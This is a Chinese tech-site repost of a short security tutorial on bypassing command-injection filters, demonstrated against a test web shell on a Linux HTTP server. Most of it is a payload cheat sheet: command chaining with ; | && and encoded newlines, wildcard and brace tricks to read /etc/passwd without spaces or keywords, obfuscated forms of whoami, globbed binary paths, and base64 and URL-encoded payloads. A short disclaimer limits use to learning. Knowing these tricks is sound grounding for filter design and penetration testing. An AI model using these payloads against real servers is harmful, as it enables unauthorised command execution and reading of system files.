0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

Linux命令执行Bypass常见姿势

哆啦安全 来源:哆啦安全 2023-05-22 16:21 次阅读
3b99862a-f879-11ed-90ce-dac502259ad0.png  0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!3b99862a-f879-11ed-90ce-dac502259ad0.png  0x01实践演示

部署服务器端为Linux系统的http服务,留存get和post方式的一句话木马,用于命令执行测试。(测试思路可以对话Chatgpt

3bb18086-f879-11ed-90ce-dac502259ad0.png

linux逻辑运算符

; //分号

3bc4a18e-f879-11ed-90ce-dac502259ad0.png


	

| //仅执行后面那条命令

3bcda9c8-f879-11ed-90ce-dac502259ad0.png

|| //仅执行前面那条命令

3bd67206-f879-11ed-90ce-dac502259ad0.png

& //两条命令都会执行

3bdc6206-f879-11ed-90ce-dac502259ad0.png

&& //两条命令都会执行(注意url编码)

3be64e74-f879-11ed-90ce-dac502259ad0.png

%0a //换行符 %0d //回车符

3bec3334-f879-11ed-90ce-dac502259ad0.png

利用通配符

通配符"?"代表任意一个字符,"*"代表任意个字符

cat%20/etc/pa??wd

3bfbf238-f879-11ed-90ce-dac502259ad0.png

cat%20/etc/pa?*wd

3c04df2e-f879-11ed-90ce-dac502259ad0.png

尝试

cat /*****et*c*/*pas**************************************************swd

3c0e043c-f879-11ed-90ce-dac502259ad0.png

结合上述方式进行组合bypass

echo mt ; whoami

3c271242-f879-11ed-90ce-dac502259ad0.png

使用大括号来绕过空格的限制

{cat,/etc/passwd}

3c2e50ac-f879-11ed-90ce-dac502259ad0.png

{ls,-alth}

3c3b1c9c-f879-11ed-90ce-dac502259ad0.png

命令混淆

whoami
wh$1oami
who$@ami
whoa$*mi

3c42f8d6-f879-11ed-90ce-dac502259ad0.png

命令变形

/*/bin/wh*mi
/us*/*in/who*mi
/*s?/*?n/w?o*i

3c50c556-f879-11ed-90ce-dac502259ad0.png

3c5c7374-f879-11ed-90ce-dac502259ad0.png

3c64d2ee-f879-11ed-90ce-dac502259ad0.png

base64编码方式进行

echo id|base64
echo id|base64

3c7289c0-f879-11ed-90ce-dac502259ad0.png

URL编码

%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b

3c784a86-f879-11ed-90ce-dac502259ad0.png


审核编辑 :李倩


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • Linux
    +关注

    关注

    87

    文章

    11298

    浏览量

    209382
  • 服务器
    +关注

    关注

    12

    文章

    9138

    浏览量

    85366
  • 逻辑运算
    +关注

    关注

    0

    文章

    56

    浏览量

    9761

原文标题:Linux命令执行Bypass常见姿势

文章出处:【微信号:哆啦安全,微信公众号:哆啦安全】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    Linux常见命令有哪些

    摘要:这是对周立功编著的《嵌入式Linux开发教程》的第7期连载。本期刊载内容有关LinuxLinux常见命令中的导航命令、目录命令和文件
    发表于 10-28 10:06

    学习常见Linux命令

    一、学习常见Linux命令(1)文件操作命令主要包括查看文件命令(ls)、显示文件内容命令(c
    发表于 11-05 08:43

    Linux命令链接操作符的实际应用

    Linux命令中的链接的意思是,通过操作符的行为将几个命令组合执行Linux中的链接命令,有些
    发表于 05-06 17:44 840次阅读

    嵌入式Linux开发教程:Linux常见命令(上篇)

    摘要:这是对周立功编著的《嵌入式Linux开发教程》的第7期连载。本期刊载内容有关LinuxLinux常见命令中的导航命令、目录命令和文件
    发表于 10-21 13:36 11次下载
    嵌入式<b class='flag-5'>Linux</b>开发教程:<b class='flag-5'>Linux</b><b class='flag-5'>常见</b><b class='flag-5'>命令</b>(上篇)

    linux技术:WAF运行命令执行方法

    如果命令执行的时候遇到拦截命令关键词的时候可以利用如下方法绕过: "和^是CMD命令中最常见的转义字符,还有成对的括号并不会影响
    发表于 11-07 20:27 991次阅读

    如何在Linux使用touch命令

    Linux touch命令用于更改文件时间戳。但touch命令的最常见用法是创建文件。
    的头像 发表于 12-05 17:21 2074次阅读

    Linux命令执行Bypass常见姿势介绍

    部署服务器端为Linux系统的http服务,留存get和post方式的一句话木马,用于命令执行测试。(测试思路可以对话Chatgpt)
    的头像 发表于 05-22 16:20 1998次阅读
    <b class='flag-5'>Linux</b><b class='flag-5'>命令</b><b class='flag-5'>执行</b><b class='flag-5'>Bypass</b><b class='flag-5'>常见</b><b class='flag-5'>姿势</b>介绍

    常用linux网络排查命令

    今天浩道跟大家分享linux网络运维中常见命令,掌握好这些命令,在排查故障时将会游刃有余!
    发表于 06-25 10:49 808次阅读

    shell命令linux命令一样吗

    Shell命令Linux命令并不完全一样。 首先,Shell是一种命令行解释器,它是用来解释和执行用户输入的
    的头像 发表于 11-08 10:51 2868次阅读

    linux命令和shell编程有什么联系

    Linux命令和Shell编程之间存在密切的联系。 首先,Shell是Linux命令行下的解释器,它提供了一个用户界面,使用户能够与Linux
    的头像 发表于 11-08 10:53 928次阅读

    linux中source命令的用法

    Linux中,source命令通常用于重新执行刚修改的初始化文件,使之立即生效,而不必注销并重新登录。source命令可以用于读取并执行
    的头像 发表于 11-08 14:35 2328次阅读

    linux重启命令有哪些

    Linux是一种自由和开放源代码的操作系统,被广泛应用于服务器和嵌入式设备。在Linux中,有多种命令用于重启系统。在本文中,我们将详细介绍常用的Linux重启
    的头像 发表于 11-17 09:49 2035次阅读

    总结linux命令行的主要用法

    Linux命令行是一种在Linux操作系统中通过文本界面来执行指令和管理系统的方式。它提供了丰富的功能和灵活性,帮助用户完成各种任务。本文将详细介绍
    的头像 发表于 11-17 10:19 664次阅读

    uboot命令执行过程是什么

    U-boot是通过执行u-boot提供的命令来加载Linux内核的,其中 命令bootm的功能 即为从memory启动Linux内核映像文件
    的头像 发表于 12-04 17:31 806次阅读

    bypass电容多大 bypass电容怎么计算

    Bypass电容的大小和计算方法 Bypass电容是一种常见的电子元件,用于绕过或降低电路中的噪声、干扰或漏磁磁通。它能够有效地将高频噪声或漏磁磁通通过一个低阻抗路径绕过,从而保持电路的稳定性和信号
    的头像 发表于 02-14 17:56 4059次阅读